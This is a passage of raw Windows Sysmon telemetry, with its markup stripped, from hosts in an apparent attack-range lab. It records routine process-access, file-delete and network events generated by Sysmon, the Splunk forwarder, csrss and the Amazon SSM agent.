11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-19F9-6216-5A05-000000003902}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F9-6216-5A05-000000003902}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.496{4F8D34B0-19F9-6216-5A05-000000003902}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.245{4F8D34B0-19F8-6216-5905-000000003902}2768908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F8-6216-5905-000000003902}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDBBDA3A179DB52013D28A4AF99B7635,SHA256=B75805FF27E59C3A086B385A09DD47311392761077C3F081B24AAF827168E9F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19F8-6216-5905-000000003902}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000299278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:50.157{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79AAE5ABA7836EF72F4BA0DEB184BA8D,SHA256=4FFB3D7A9D8A87B1CD89BD36C92496F4FD99B80D8175BFBF95581431DD9E4596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:50.324{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CED5576BA9E291BEF1F3775AABF76E01,SHA256=C406FA529EDB4871DFFA368B405E5C57E732189FF4F1E785FEEB317BD32DAF4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:50.011{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6F80A2936D45A5C8A893862F40DE5C9,SHA256=E4D41703010D85125BA34185CAD6DE6FC96D038DAEED98DDBE15E9376A5CD91F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:51.210{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BC920761DE65D71DFB4AED46B5380ED,SHA256=6176BB35110FA8522594DAF0276FBE45C089D473BBBB2A0F1F07F8148C033BBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223166Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.687{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-169MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223165Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51764-false10.0.1.12-8000- 10341000x8000000000000000223164Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19FB-6216-5B05-000000003902}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223161Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223160Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223159Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 